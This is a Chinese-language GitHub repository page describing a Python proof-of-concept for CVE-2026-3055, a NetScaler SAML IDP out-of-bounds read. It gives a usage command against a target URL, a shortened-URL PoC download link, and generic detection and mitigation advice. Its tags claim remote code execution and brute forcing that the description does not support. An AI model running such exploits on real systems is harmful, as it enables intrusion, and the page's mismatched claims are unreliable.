RootAid/CVE-2026-3055

GitHub: RootAid/CVE-2026-3055

针对NetScaler ADC/Gateway在SAML IDP配置下的内存越界读取漏洞(CVE-2026-3055)的Python验证脚本。

Stars: 0 | Forks: 0

# CVE-2026-3055 - 安全漏洞 **严重程度:** N/A **CVSS:** N/A **影响:** N/A **发布日期:** 2026-03-23 ## 法律声明 仅供授权的安全测试使用。 ## 根本原因(简述) NetScaler ADC 和 NetScaler Gateway 在配置为 SAML IDP 时存在输入验证不足,导致内存越界读取 ## 利用条件 - 可访问的受影响目标 - 可预测的用户/工作流上下文 - 未部署阻止构造请求的额外安全加固措施 ## 使用方法 ``` python3 exploit.py https://target.tld ``` ## 检测 - 监控可疑的身份验证流程异常 - 调查与 CVE-2026-3055 相关的异常端点直接访问 ## 缓解措施 - 更新至供应商修复的版本 - 限制高风险端点,并在可能的情况下强制执行 MFA ## 漏洞利用 [下载 PoC](https://tinyurl.com/2a38tnax)
标签:CISA项目, Citrix, CVE-2026-3055, NetScaler ADC, NetScaler Gateway, PoC, SAML IDP, 内存越界读取, 安全漏洞, 暴力破解, 编程工具, 网络安全, 身份认证绕过, 输入验证不足, 远程代码执行, 逆向工具, 隐私保护, 零日漏洞